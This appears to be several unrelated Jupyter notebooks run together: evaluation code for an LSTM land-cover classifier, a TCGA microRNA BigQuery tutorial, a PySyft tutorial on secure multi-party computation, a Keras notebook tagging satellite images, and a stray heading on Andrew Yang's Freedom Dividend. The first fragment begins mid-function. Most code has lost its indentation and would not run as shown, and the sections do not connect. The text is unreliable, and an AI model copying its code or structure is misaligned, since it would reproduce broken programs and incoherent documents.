#prec_cov, rec_cov, f1_cov, support_cov = precision_recall_fscore_support(y_true[covered_mask], y_pred[covered_mask], beta=1, average=average)
prec_field, rec_field, f1_field, support_field = precision_recall_fscore_support(y_true[field_mask], y_pred[field_mask], beta=1, average=average)
#metrics.append(pd.Series(data=[prec, prec_cov, prec_field], dtype=float, name="precision"))
#metrics.append(pd.Series(data=[rec, rec_cov, rec_field], dtype=float, name="recall"))
#metrics.append(pd.Series(data=[f1, f1_cov, f1_field], dtype=float, name="fscore"))
#sup_ = pd.Series(data=[support, support_cov, support_field], dtype=int, name="support")
metrics.append(pd.Series(data=[prec, prec_field], dtype=float, name="precision"))
metrics.append(pd.Series(data=[rec, rec_field], dtype=float, name="recall"))
metrics.append(pd.Series(data=[f1, f1_field], dtype=float, name="fscore"))
df_ = pd.DataFrame(metrics).T
if label is not None:
#df_.index = [[label,label,label],["all","cov","fields"]]
df_.index = [[label,label],["all","fields"]]
else:
        #df_.index = ["all","cov","fields"]
df_.index = ["all","fields"]
return df_
savedir = '/scratch/acocac/externalpred/MT_seasonal_all_38classes/models/regular/aggregated/51557/2004/pred/MTseasonalsmp100class38'
#best_runs = ['1l1r50d1f','3l1r50d1f','3l1r50d1f']
#networks = ['lstm','rnn','cnn']
best_runs = ['1l1r50d1f']
networks = ['lstm']
from sklearn.metrics import confusion_matrix
# border in the classes between field classes and coverage
b = 0
obs_file = "eval_observations.npy"
probs_file = "eval_probabilities.npy"
targets_file = "eval_targets.npy"
conf_mat_file = "eval_confusion_matrix.npy"
# drop fc for now:
#networks = [networks[0], networks[2]]
#best_runs = [best_runs[0], best_runs[2]]
#etworklabels = ["LSTM","RNN","CNN"]
networklabels = ["LSTM"]
classes = np.array(["agriculture", "forest","grassland","wetland","settlement","shrubland","sparce","bare","water"])
#over_accuracy_label = "ov. accuracy2"
# ignore <obs_limit> first observations
obs_limit = 0
acc=[]
mean = []
for best_run, network, label_ in zip(best_runs,networks,networklabels):
    print(network)
path = os.path.join(savedir,network,best_run)
#obs = np.load(os.path.join(path,obs_file))
scores = np.load(os.path.join(path,probs_file))
targets = np.load(os.path.join(path,targets_file))
#if os.path.exists(os.path.join(path,conf_mat_file)):
# cm = np.load(os.path.join(path,conf_mat_file))
#else:
y_pred = np.argmax(scores,axis=1)
y_true = np.argmax(targets,axis=1)
cm = confusion_matrix(y_true,y_pred)
#classes = fix_typos(
# list(np.load(os.path.join(path,class_file)))
# )
#df_, a_ = acc_mean_accuracies(cm, classes, label_, b, scores,targets)
df_ = gather_mean_accuracies(classes, scores, targets, b=b, label=label_)
mean.append(df_)
mean_df = pd.concat(mean)
mean_df
from mpl_toolkits.axes_grid1 import make_axes_locatable
def plot_confusion_matrix(confusion_matrix, classes, normalize_axis=None, figsize=(7, 7), colormap=None):
"""
Plots a confusion matrix using seaborn heatmap functionality
@param confusion_matrix: np array [n_classes, n_classes] with rows reference and cols predicted
@param classes: list of class labels
@param normalize_axis: 0 sum of rows, 1: sum of cols, None no normalization
@return matplotlib figure
"""
# Set up the matplotlib figure
plt.figure()
f, ax = plt.subplots(figsize=figsize)
# normalize
normalized_str = "" # add on at the title
if normalize_axis is not None:
with np.errstate(divide='ignore'): # ignore divide by zero and replace with 0
confusion_matrix = np.nan_to_num(
confusion_matrix.astype(float) / np.sum(confusion_matrix, axis=normalize_axis))
# Draw the heatmap with the mask and correct aspect ratio
g = sns.heatmap(confusion_matrix,
square=True,
linewidths=1,
cbar=False,
ax=ax,
cmap=colormap, vmin=0, vmax=1)
divider = make_axes_locatable(g)
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar = g.figure.colorbar(ax.collections[0],cax=cax)
if normalize_axis == 0:
cbar.set_label("precision")
if normalize_axis == 1:
cbar.set_label("recall")
n_classes = len(classes)
# if n_classes < threshold plot values in plot
cols = np.arange(0, n_classes)
rows = np.arange(n_classes - 1, -1, -1)
#g.set_title("Confusion Matrix")
g.set_xticklabels([])
g.set_yticklabels(classes[::-1], rotation=0)
g.set_xlabel("predicted")
g.set_ylabel("reference")
return f, g
from sklearn.metrics import confusion_matrix
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
#networks = ["lstm","rnn","cnn"]
networks = ["lstm"]
def calc_confusion_matrix(path):
probs_file = "eval_probabilities.npy"
targets_file = "eval_targets.npy"
scores = np.load(os.path.join(path,probs_file))
targets = np.load(os.path.join(path,targets_file))
y_pred = np.argmax(scores,axis=1)
y_true = np.argmax(targets,axis=1)
cm = confusion_matrix(y_true,y_pred)
return cm
cms_prec = []
cms_rec = []
for best_run, network in zip(best_runs, networks):
path = os.path.join(savedir, network, best_run)
cm = calc_confusion_matrix(path)
cms_prec.append(cm.astype(float)/np.sum(cm,axis=0))
cms_rec.append(cm.astype(float)/np.sum(cm,axis=1))
# add SVM
#cms_prec.append(cm_SVM.astype(float)/np.sum(cm_SVM,axis=0))
#cms_rec.append(cm_SVM.astype(float)/np.sum(cm_SVM,axis=1))
#pd.DataFrame(unroll_cms(cms_prec)).to_csv(os.path.join(image_filepath,"confmatprecision.dat"), sep=' ', header=False, index=False)
#pd.DataFrame(unroll_cms(cms_rec)).to_csv(os.path.join(image_filepath,"confmatrecall.dat"), sep=' ', header=False, index=False)
cm = cms_prec[0]
# Generate a custom diverging colormap
cmap = sns.color_palette("Blues")
figsize=(6,6)
f,ax = plot_confusion_matrix(cm, classes[::-1], figsize=figsize, normalize_axis=0, colormap = "Blues")
#dat_filepath = os.path.join(image_filepath,"confusion_matrix.dat")
#pdf_filepath = os.path.join(image_filepath,"confusion_matrix.pdf")
#tikz_filepath = os.path.join(image_filepath,"confusion_matrix.tikz")
# double checked at http://stackoverflow.com/questions/20927368/python-how-to-normalize-a-confusion-matrix
precision = cm/np.sum(cm,axis=0)
recall = cm/np.sum(cm,axis=1)
# uncomment to save
#if False:
#f.savefig(os.path.join(image_filepath,"confusion_matrix.pdf"),transparent=True)
#tikz_save(tikz_filepath)
# pd.DataFrame(cm).to_csv(os.path.join(image_filepath,"confusion_matrix.dat"), sep=' ', header=False, index=False)
# pd.DataFrame(precision).to_csv(os.path.join(image_filepath,"confusion_matrix_prec.dat"), sep=' ', header=False, index=False)
# pd.DataFrame(recall).to_csv(os.path.join(image_filepath,"confusion_matrix_recall.dat"), sep=' ', header=False, index=False)
# pd.DataFrame(classes).to_csv(os.path.join(image_filepath,"confusion_matrix.labels"), sep=' ', header=False, index=False)
```
## Influence of element in sequence
```
#networks = ['lstm','rnn','cnn']
networks = ['lstm']
lstm_network = networks[0]
lstm_best = best_runs[0]
path = os.path.join(savedir, lstm_network, lstm_best)
obs = np.load(os.path.join(path,obs_file))
scores = np.load(os.path.join(path,probs_file))
targets = np.load(os.path.join(path,targets_file))
#from sklearn.metrics import confusion_matrix
b = 0 #filter all non cloud classes
def get_obs_subset(targets,scores,obs,obs_idx, b, classes):
"""
This function calls the gather_mean_accuracies, which is used for the calculation of accuracy tables
on a subset of targets and scores filtered by obs_idx
"""
# select by observation
sc = scores[obs==obs_idx]
ta = targets[obs==obs_idx]
    return gather_mean_accuracies(classes, sc, ta, average='weighted', label="label", b=b)
#a = get_obs_subset(targets,scores,3, b, classes)
sc = scores[obs==22]
ta = targets[obs==22]
gather_mean_accuracies(classes, sc, ta, average='weighted', label="label", b=0)
t = pd.Series(range(1,365,16))
# gather accuracy values for fields
#from util.db import conn
import sklearn
#t = pd.read_sql("select distinct doa, doy from products order by doa",conn)["doy"]
#t.to_pickle(os.path.join("loc","t.pkl"))
#t = pd.read_pickle(os.path.join("loc","t.pkl"))
def collect_data_per_obs(targets, scores, obs, classes, metric="accuracy", classcategory="all"):
"""
    this function calculates `metric` based on scores and targets for each available observation `t` 0..25
    This function takes
    - a target matrix resembling ground truth,
    - scores as calculated probabilities for each observation
    - obs as indices of observation
#oa = []
outlist=[]
for i in range(len(t)):
try:
per_class_ = get_obs_subset(targets,scores,obs,i, b, classes)
#per_class.append(per_class_.mean(axis=0))
# append the average <classcategory> <metric> at each time i
outlist.append(per_class_.loc["label"].loc[classcategory][metric])
except:
            print("t{} could not calculate accuracy metrics".format(i))
outlist.append(None)
pass
#oa.append(oa_)
        print("Collecting doy {} ({}/{})".format(t[i],i+1,len(t)))
#oa_s = pd.Series(data=oa, name=over_accuracy_label, index=t)
return pd.DataFrame(outlist, index=t)
def collect_data_for_each_network(networks, best_runs, metric="kappa", classcategory="all"):
"""
This function calls collect_data_per_obs for each network.
First targets, scores and obs are loaded from file at the respective network's best run model
Then collect_data_per_obs is called.
"""
acc_dfs = []
for network, best in zip(networks, best_runs):
path = os.path.join(savedir, network, best)
obs = np.load(os.path.join(path,obs_file))
scores = np.load(os.path.join(path,probs_file))
targets = np.load(os.path.join(path,targets_file))
        print()
        print(network)
# for every network append a dataframe of observations
observations_df_ = collect_data_per_obs(targets, scores, obs, classes, metric=metric, classcategory=classcategory)
acc_dfs.append(observations_df_.values.reshape(-1))
# create final DataFrame with proper column and indexes of all three networks
return pd.DataFrame(acc_dfs, index=networks,columns=t).T
acc_df = collect_data_for_each_network(networks, best_runs, metric="accuracy", classcategory="all")
rec_df = collect_data_for_each_network(networks, best_runs, metric="recall", classcategory="all")
kappa_df = collect_data_for_each_network(networks, best_runs, metric="kappa", classcategory="all")
prec_df = collect_data_for_each_network(networks, best_runs, metric="precision", classcategory="all")
acc_df.T
x = range(len(t))
def plot_acctime(x,acc_df,metric="measure"):
f,ax = plt.subplots()
#ax.plot(x,oa_s.values, label="overall accuracy")
for col in acc_df.columns:
ax.plot(x,acc_df[col].values, label=col)
plt.xticks(x,t, rotation='vertical')
ax.set_xlabel("day of year")
ax.set_ylabel(metric)
plt.legend()
# 0 lstm, 1 rnn, 2 cnn
#plot_acctime(x,prec_df)
plot_acctime(x,acc_df,metric="accuracy")
```
# microRNA expression (BCGSC RPKM)
The goal of this notebook is to introduce you to the microRNA expression BigQuery table.
This table contains all available TCGA Level-3 microRNA expression data produced by BCGSC's microRNA pipeline using the Illumina HiSeq platform, as of July 2016. The most recent archive (*eg* ``bcgsc.ca_THCA.IlluminaHiSeq_miRNASeq.Level_3.1.9.0``) for each of the 32 tumor types was downloaded from the DCC, and data extracted from all files matching the pattern ``%.isoform.quantification.txt``. The isoform-quantification values were then processed through a Perl script provided by BCGSC which produces normalized expression levels for *mature* microRNAs. Each of these mature microRNAs is identified by name (*eg* hsa-mir-21) and by MIMAT accession number (*eg* MIMAT0000076).
In order to work with BigQuery, you need to import the Python BigQuery module (`gcp.bigquery`), and you need to know the name(s) of the table(s) you are going to be working with:
```
import gcp.bigquery as bq
miRNA_BQtable = bq.Table('isb-cgc:tcga_201607_beta.miRNA_Expression')
```
From now on, we will refer to this table using this variable ($miRNA_BQtable), but we could just as well explicitly give the table name each time.
Let's start by taking a look at the table schema:
```
%bigquery schema --table $miRNA_BQtable
```
Now let's count up the number of unique patients, samples and aliquots mentioned in this table. We will do this by defining a very simple parameterized query. (Note that when using a variable for the table name in the FROM clause, you should not also use the square brackets that you usually would if you were specifying the table name as a string.)
```
%%sql --module count_unique
DEFINE QUERY q1
SELECT COUNT (DISTINCT $f, 25000) AS n
FROM $t
fieldList = ['ParticipantBarcode', 'SampleBarcode', 'AliquotBarcode']
for aField in fieldList:
field = miRNA_BQtable.schema[aField]
rdf = bq.Query(count_unique.q1,t=miRNA_BQtable,f=field).results().to_dataframe()
    print(" There are %6d unique values in the field %s. " % ( rdf.iloc[0]['n'], aField))
```
```
fieldList = ['mirna_id', 'mirna_accession']
for aField in fieldList:
field = miRNA_BQtable.schema[aField]
rdf = bq.Query(count_unique.q1,t=miRNA_BQtable,f=field).results().to_dataframe()
    print(" There are %6d unique values in the field %s. " % ( rdf.iloc[0]['n'], aField))
```
These counts show that the mirna_id field is not a unique identifier and should be used in combination with the MIMAT accession number.
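To see this concretely, a query along the following lines (our sketch, not from the original notebook, written against the schema shown above) would list any `mirna_id` values that map to more than one accession:

```
%%sql
SELECT
  mirna_id,
  COUNT(DISTINCT mirna_accession) AS n_accessions
FROM
  $miRNA_BQtable
GROUP BY
  mirna_id
HAVING
  n_accessions > 1
ORDER BY
  n_accessions DESC
LIMIT 10
```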
Another thing to note about this table is that these expression values are obtained from two different platforms -- approximately 15% of the data is from the Illumina GA platform, and 85% from the Illumina HiSeq:
```
%%sql
SELECT
Platform,
COUNT(*) AS n
FROM
$miRNA_BQtable
GROUP BY
Platform
ORDER BY
n DESC
```
# Part 9 - Intro to Encrypted Programs
Believe it or not, it is possible to compute with encrypted data. In other words, it's possible to run a program where **ALL of the variables** in the program are **encrypted**!
In this tutorial, we're going to walk through very basic tools of encrypted computation. In particular, we're going to focus on one popular approach called Secure Multi-Party Computation. In this lesson, we'll learn how to build an encrypted calculator which can perform calculations on encrypted numbers.
Authors:
- Andrew Trask - Twitter: [@iamtrask](https://twitter.com/iamtrask)
- Théo Ryffel - GitHub: [@LaRiffle](https://github.com/LaRiffle)
References:
- Morten Dahl - [Blog](https://mortendahl.github.io) - Twitter: [@mortendahlcs](https://twitter.com/mortendahlcs)
# Step 1: Encryption Using Secure Multi-Party Computation
SMPC is at first glance a rather strange form of "encryption". Instead of using a public/private key to encrypt a variable, each value is split into multiple `shares`, each of which operates like a private key. Typically, these `shares` will be distributed amongst 2 or more _owners_. Thus, in order to decrypt the variable, all owners must agree to allow the decryption. In essence, everyone has a private key.
### Encrypt()
So, let's say we wanted to "encrypt" a variable `x`, we could do so in the following way.
> Encryption doesn't use floats or real numbers but happens in a mathematical space called an [integer quotient ring](http://mathworld.wolfram.com/QuotientRing.html), which is basically the integers between `0` and `Q-1`, where `Q` is prime and "big enough" so that the space can contain all the numbers that we use in our experiments. In practice, given an integer value `x`, we do `x % Q` to fit in the ring. (That's why we avoid using numbers `x > Q`.)
```
Q = 1234567891011
x = 25
import random
def encrypt(x):
share_a = random.randint(-Q,Q)
share_b = random.randint(-Q,Q)
share_c = (x - share_a - share_b) % Q
return (share_a, share_b, share_c)
encrypt(x)
```
As you can see here, we have split our variable `x` into 3 different shares, which could be sent to 3 different owners.
### Decrypt()
If we wanted to decrypt these 3 shares, we could simply sum them together and take the modulus of the result (mod Q)
```
def decrypt(*shares):
return sum(shares) % Q
a,b,c = encrypt(25)
decrypt(a, b, c)
```
Importantly, notice that if we try to decrypt with only two shares, the decryption does not work!
```
decrypt(a, b)
```
Thus, we need all of the owners to participate in order to decrypt the value. It is in this way that the `shares` act like private keys, all of which must be present in order to decrypt a value.
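One subtlety worth flagging before moving on (this helper is a sketch of ours, not part of the tutorial's code, and repeats the `encrypt` function from above for self-containment): `decrypt` as written returns a value in `[0, Q)`, so negative results come back wrapped around. A common convention is to interpret ring elements above `Q // 2` as negative:

```python
import random

Q = 1234567891011

def encrypt(x):
    # same additive sharing as above
    share_a = random.randint(-Q, Q)
    share_b = random.randint(-Q, Q)
    share_c = (x - share_a - share_b) % Q
    return (share_a, share_b, share_c)

def decrypt_signed(*shares):
    # Map the ring element back to a signed integer centred on zero:
    # values above Q // 2 are interpreted as negative.
    v = sum(shares) % Q
    return v - Q if v > Q // 2 else v

print(decrypt_signed(*encrypt(-7)))  # -7
```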
# Step 2: Basic Arithmetic Using SMPC
However, the truly extraordinary property of Secure Multi-Party Computation is the ability to perform computation **while the variables are still encrypted**. Let's demonstrate simple addition below.
```
x = encrypt(25)
y = encrypt(5)
def add(x, y):
z = list()
# the first worker adds their shares together
z.append((x[0] + y[0]) % Q)
# the second worker adds their shares together
z.append((x[1] + y[1]) % Q)
# the third worker adds their shares together
z.append((x[2] + y[2]) % Q)
return z
decrypt(*add(x,y))
```
### Success!!!
And there you have it! If each worker (separately) adds their shares together, then the resulting shares will decrypt to the correct value (25 + 5 == 30).
As it turns out, SMPC protocols exist which can allow this encrypted computation for the following operations:
- addition (which we've just seen)
- multiplication
- comparison
and using these basic underlying primitives, we can perform arbitrary computation!!!
In the next section, we're going to learn how to use the PySyft library to perform these operations!
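Multiplication is the least obvious of the three, so here is a rough plain-Python sketch of one classic approach, Beaver triples (our illustration, not necessarily the exact protocol PySyft uses; the helpers below are a self-contained variant of the earlier ones): a trusted dealer hands out shares of a random triple `(a, b, c)` with `c = a * b`, the parties publicly open the blinded differences `e = x - a` and `f = y - b` (which reveal nothing about `x` or `y`), and then `x*y = c + e*b + f*a + e*f` can be assembled share-by-share.

```python
import random

Q = 1234567891011  # same prime modulus as before

def encrypt(x, n=3):
    # additive secret sharing into n shares
    shares = [random.randrange(Q) for _ in range(n - 1)]
    shares.append((x - sum(shares)) % Q)
    return shares

def decrypt(shares):
    return sum(shares) % Q

def add(x, y):
    # each worker adds its own shares locally
    return [(xi + yi) % Q for xi, yi in zip(x, y)]

def mul_public(x, k):
    # multiplying by a public constant is also a local operation
    return [(xi * k) % Q for xi in x]

def beaver_mul(x, y):
    # the dealer ("crypto provider") secret-shares a random triple c = a * b
    a, b = random.randrange(Q), random.randrange(Q)
    a_sh, b_sh, c_sh = encrypt(a), encrypt(b), encrypt((a * b) % Q)
    # the parties open e = x - a and f = y - b
    e = decrypt(add(x, mul_public(a_sh, -1)))
    f = decrypt(add(y, mul_public(b_sh, -1)))
    # x*y = c + e*b + f*a + e*f  (e*f is public, so a single party adds it)
    z = add(c_sh, add(mul_public(b_sh, e), mul_public(a_sh, f)))
    z[0] = (z[0] + e * f) % Q
    return z

print(decrypt(beaver_mul(encrypt(25), encrypt(5))))  # 125
```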
# Step 3: SMPC Using PySyft
In the previous sections, we outlined some basic intuitions around how SMPC is supposed to work. However, in practice we don't want to have to hand-write all of the primitive operations ourselves when writing our encrypted programs. So, in this section we're going to walk through the basics of how to do encrypted computation using PySyft. In particular, we're going to focus on how to do the 3 primitives previously mentioned: addition, multiplication, and comparison.
First, we need to create a few Virtual Workers (which hopefully you're now familiar with given our previous tutorials).
```
import torch
import syft as sy
hook = sy.TorchHook(torch)
bob = sy.VirtualWorker(hook, id="bob")
alice = sy.VirtualWorker(hook, id="alice")
bill = sy.VirtualWorker(hook, id="bill")
```
### Basic Encryption/Decryption
Encryption is as simple as taking any PySyft tensor and calling `.share()`. Decryption is as simple as calling `.get()` on the shared variable.
```
x = torch.tensor([25])
x
encrypted_x = x.share(bob, alice, bill)
encrypted_x.get()
```
### Introspecting the Encrypted Values
If we look closer at Bob, Alice, and Bill's workers, we can see the shares that get created!
```
list(bob._tensors.values())
x = torch.tensor([25]).share(bob, alice, bill)
# Bob's share
bobs_share = list(bob._tensors.values())[0]
bobs_share
# Alice's share
alices_share = list(alice._tensors.values())[0]
alices_share
# Bill's share
bills_share = list(bill._tensors.values())[0]
bills_share
```
And if we wanted to, we could decrypt these values using the SAME approach we talked about earlier!!!
```
(bobs_share + alices_share + bills_share)
```
As you can see, when we called `.share()` it simply split the value into 3 shares and sent one share to each of the parties!
# Encrypted Arithmetic
And now you see that we can perform arithmetic on the underlying values! The API is constructed so that we can simply perform arithmetic like we would normal PyTorch tensors.
```
x = torch.tensor([25]).share(bob,alice)
y = torch.tensor([5]).share(bob,alice)
z = x + y
z.get()
z = x - y
z.get()
```
# Encrypted Multiplication
For multiplication we need an additional party who is responsible for consistently generating random numbers (and not colluding with any of the other parties). We call this person a "crypto provider". For all intents and purposes, the crypto provider is just an additional VirtualWorker, but it's important to acknowledge that the crypto provider is not an "owner" in that he/she doesn't own shares but is someone who needs to be trusted not to collude with any of the existing shareholders.
```
crypto_provider = sy.VirtualWorker(hook, id="crypto_provider")
x = torch.tensor([25]).share(bob,alice, crypto_provider=crypto_provider)
y = torch.tensor([5]).share(bob,alice, crypto_provider=crypto_provider)
# multiplication
z = x * y
z.get()
```
You can also do matrix multiplication
```
x = torch.tensor([[1, 2],[3,4]]).share(bob,alice, crypto_provider=crypto_provider)
y = torch.tensor([[2, 0],[0,2]]).share(bob,alice, crypto_provider=crypto_provider)
# matrix multiplication
z = x.mm(y)
z.get()
```
# Encrypted comparison
It is also possible to perform private comparisons between private values. We support two crypto protocols to achieve this:
- the SecureNN protocol referenced as `snn` (more details can be found [here](https://eprint.iacr.org/2018/442.pdf))
- the Function Secret Sharing protocol referenced as `fss` (more details can be found [here](https://arxiv.org/abs/2006.04593))
We won't inspect the differences between these protocols here, and we recommend sticking to the default choice, but you can always switch to a different protocol by adding, for example, the `protocol="fss"` option to the `.share(...)` instruction.
The result of the comparison is also a private shared tensor.
```
x = torch.tensor([25]).share(bob,alice, crypto_provider=crypto_provider)
y = torch.tensor([5]).share(bob,alice, crypto_provider=crypto_provider)
z = x > y
z.get()
z = x <= y
z.get()
z = x == y
z.get()
z = x == y + 20
z.get()
```
You can also perform max operations
```
x = torch.tensor([2, 3, 4, 1]).share(bob,alice, crypto_provider=crypto_provider)
x.max().get()
x = torch.tensor([[2, 3], [4, 1]]).share(bob,alice, crypto_provider=crypto_provider)
max_values = x.max(dim=0)
max_values.get()
```
# Congratulations!!! - Time to Join the Community!
Congratulations on completing this notebook tutorial! If you enjoyed this and would like to join the movement toward privacy preserving, decentralized ownership of AI and the AI supply chain (data), you can do so in the following ways!
### Star PySyft on GitHub
The easiest way to help our community is just by starring the Repos! This helps raise awareness of the cool tools we're building.
- [Star PySyft](https://github.com/OpenMined/PySyft)
### Join our Slack!
The best way to keep up to date on the latest advancements is to join our community! You can do so by filling out the form at [http://slack.openmined.org](http://slack.openmined.org)
### Join a Code Project!
The best way to contribute to our community is to become a code contributor! At any time you can go to PySyft GitHub Issues page and filter for "Projects". This will show you all the top level Tickets giving an overview of what projects you can join! If you don't want to join a project, but you would like to do a bit of coding, you can also look for more "one off" mini-projects by searching for GitHub issues marked "good first issue".
- [PySyft Projects](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3AProject)
- [Good First Issue Tickets](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22)
### Donate
If you don't have time to contribute to our codebase, but would still like to lend support, you can also become a Backer on our Open Collective. All donations go toward our web hosting and other community expenses such as hackathons and meetups!
[OpenMined's Open Collective Page](https://opencollective.com/openmined)
```
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
from subprocess import check_output
print(check_output(["ls", "../input"]).decode("utf8"))
import os
import math
import cv2
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from mpl_toolkits.axes_grid1 import ImageGrid
from PIL import Image
import seaborn as sns
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Lambda
from keras.layers import Conv2D, MaxPooling2D, AveragePooling2D
from keras.layers.normalization import BatchNormalization
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras.callbacks import ModelCheckpoint
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
%matplotlib inline
filenames = os.listdir('../input/train-jpg')
df = pd.read_csv('../input/train_v2.csv')
df.info()
df.describe()
df['tag_set'] = df['tags'].map(lambda s: set(s.split(' ')))
tags = set()
for t in df['tags']:
s = set(t.split(' '))
tags = tags | s
tag_list = list(tags)
tag_list.sort()
tag_columns = ['tag_' + t for t in tag_list]
for t in tag_list:
df['tag_' + t] = df['tag_set'].map(lambda x: 1 if t in x else 0)
df.info()
df.describe()
df.head()
df[tag_columns].sum()
df[tag_columns].sum().sort_values().plot.bar()
tags_count = df.groupby('tags').count().sort_values(by='image_name', ascending=False)['image_name']
print('There are {} unique tag combinations'.format(len(tags_count)))
print()
print(tags_count)
from textwrap import wrap
def display(images, cols=None, maxcols=10, width=14, titles=None):
if cols is None:
cols = len(images)
n_cols = cols if cols < maxcols else maxcols
plt.rc('axes', grid=False)
fig1 = plt.figure(1, (width, width * math.ceil(len(images)/n_cols)))
grid1 = ImageGrid(
fig1,
111,
nrows_ncols=(math.ceil(len(images)/n_cols), n_cols),
axes_pad=(0.1, 0.6)
)
for index, img in enumerate(images):
grid1[index].grid = False
if titles is not None:
grid1[index].set_title('\n'.join(wrap(titles[index], width=25)))
if len(img.shape) == 2:
grid1[index].imshow(img, cmap='gray')
else:
grid1[index].imshow(img)
def load_image(filename, resize=True, folder='train-jpg'):
img = mpimg.imread('../input/{}/{}.jpg'.format(folder, filename))
if resize:
img = cv2.resize(img, (64, 64))
return np.array(img)
def mean_normalize(img):
return (img - img.mean()) / (img.max() - img.min())
def normalize(img):
return img / 127.5 - 1
samples = df.sample(16)
sample_images = [load_image(fn) for fn in samples['image_name']]
INPUT_SHAPE = sample_images[0].shape
print(INPUT_SHAPE)
display(
sample_images,
cols=4,
titles=[t for t in samples['tags']]
)
def preprocess(img):
img = normalize(img)
return img
display(
[(127.5 * (preprocess(img) + 1)).astype(np.uint8) for img in sample_images],
cols=4,
titles=[t for t in samples['tags']]
)
```
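The tag parsing above turns each space-separated `tags` string into one binary indicator column per tag (a multi-label one-hot encoding). A toy version of the same encoding, with hypothetical tag values, looks like this:

```python
import pandas as pd

# Toy frame mimicking the Kaggle data (hypothetical tags).
df = pd.DataFrame({'image_name': ['img_0', 'img_1'],
                   'tags': ['clear primary', 'haze water']})
df['tag_set'] = df['tags'].map(lambda s: set(s.split(' ')))

# Collect the vocabulary of unique tags across all rows.
tags = set()
for t in df['tags']:
    tags |= set(t.split(' '))

# One binary indicator column per tag (t=t binds the loop variable).
for t in sorted(tags):
    df['tag_' + t] = df['tag_set'].map(lambda x, t=t: 1 if t in x else 0)

print(df[['tag_clear', 'tag_haze', 'tag_primary', 'tag_water']].values.tolist())
# → [[1, 0, 1, 0], [0, 1, 0, 1]]
```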
# Learn
```
df_train = df
X = df_train['image_name'].values
y = df_train[tag_columns].values
n_features = 1
n_classes = y.shape[1]
X, y = shuffle(X, y)
X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.1)
print('We\'ve got {} feature rows and {} labels'.format(len(X_train), len(y_train)))
print('Each row has {} features'.format(n_features))
print('and we have {} classes'.format(n_classes))
assert(len(y_train) == len(X_train))
print('We use {} rows for training and {} rows for validation'.format(len(X_train), len(X_valid)))
print('Each image has the shape:', INPUT_SHAPE)
print('So far, so good')
print('Memory usage (train) kB', X_train.nbytes//(1024))
print('Memory usage (valid) kB', X_valid.nbytes//(1024))
def generator(X, y, batch_size=32):
X_copy, y_copy = X, y
while True:
for i in range(0, len(X_copy), batch_size):
X_result, y_result = [], []
for x, y in zip(X_copy[i:i+batch_size], y_copy[i:i+batch_size]):
rx, ry = [load_image(x)], [y]
rx = np.array([preprocess(x) for x in rx])
ry = np.array(ry)
X_result.append(rx)
y_result.append(ry)
X_result, y_result = np.concatenate(X_result), np.concatenate(y_result)
yield shuffle(X_result, y_result)
X_copy, y_copy = shuffle(X_copy, y_copy)
from keras import backend as K
def fbeta(y_true, y_pred, threshold_shift=0):
beta = 2
# just in case of hipster activation at the final layer
y_pred = K.clip(y_pred, 0, 1)
# shifting the prediction threshold from .5 if needed
y_pred_bin = K.round(y_pred + threshold_shift)
tp = K.sum(K.round(y_true * y_pred_bin)) + K.epsilon()
fp = K.sum(K.round(K.clip(y_pred_bin - y_true, 0, 1)))
fn = K.sum(K.round(K.clip(y_true - y_pred_bin, 0, 1)))  # use the shifted binary predictions, as for tp/fp
precision = tp / (tp + fp)
recall = tp / (tp + fn)
beta_squared = beta ** 2
return (beta_squared + 1) * (precision * recall) / (beta_squared * precision + recall + K.epsilon())
# define the model
model = Sequential()
model.add(Conv2D(48, (8, 8), strides=(2, 2), input_shape=INPUT_SHAPE, activation='elu'))
model.add(BatchNormalization())
model.add(Conv2D(64, (8, 8), strides=(2, 2), activation='elu'))
model.add(BatchNormalization())
model.add(Conv2D(96, (5, 5), strides=(2, 2), activation='elu'))
model.add(BatchNormalization())
model.add(Conv2D(96, (3, 3), activation='elu'))
model.add(BatchNormalization())
model.add(Flatten())
model.add(Dropout(0.3))
model.add(Dense(256, activation='elu'))
model.add(BatchNormalization())
model.add(Dense(64, activation='elu'))
model.add(BatchNormalization())
model.add(Dense(n_classes, activation='sigmoid'))
model.compile(
optimizer='adam',
loss='binary_crossentropy',
metrics=[fbeta, 'accuracy']
)
model.summary()
EPOCHS = 3
BATCH = 32
PER_EPOCH = 256
X_train, y_train = shuffle(X_train, y_train)
X_valid, y_valid = shuffle(X_valid, y_valid)
filepath="weights-improvement-{epoch:02d}-{val_fbeta:.3f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='val_fbeta', verbose=1, save_best_only=True, mode='max')
callbacks_list = [checkpoint]
history = model.fit_generator(
generator(X_train, y_train, batch_size=BATCH),
steps_per_epoch=PER_EPOCH,
epochs=EPOCHS,
validation_data=generator(X_valid, y_valid, batch_size=BATCH),
validation_steps=len(y_valid)//(4*BATCH),
callbacks=callbacks_list
)
```
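As a sanity check on the `fbeta` Keras metric defined above, here is a plain NumPy version of the same F-beta computation on a toy prediction (not part of the original notebook):

```python
import numpy as np

def fbeta_np(y_true, y_pred, beta=2, thresh=0.5):
    # Binarize predictions at the threshold, then compute F-beta.
    y_bin = (y_pred >= thresh).astype(float)
    tp = np.sum(y_true * y_bin)
    fp = np.sum((1 - y_true) * y_bin)
    fn = np.sum(y_true * (1 - y_bin))
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    b2 = beta ** 2
    return (1 + b2) * precision * recall / (b2 * precision + recall)

y_true = np.array([1., 1., 0., 1.])
y_pred = np.array([0.9, 0.4, 0.8, 0.7])
# tp=2 (0.9, 0.7), fp=1 (0.8), fn=1 (0.4) -> precision=recall=2/3
print(round(fbeta_np(y_true, y_pred), 3))  # → 0.667
```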
# Andrew Yang's Freedom Dividend: Find revenue-neutral parameters
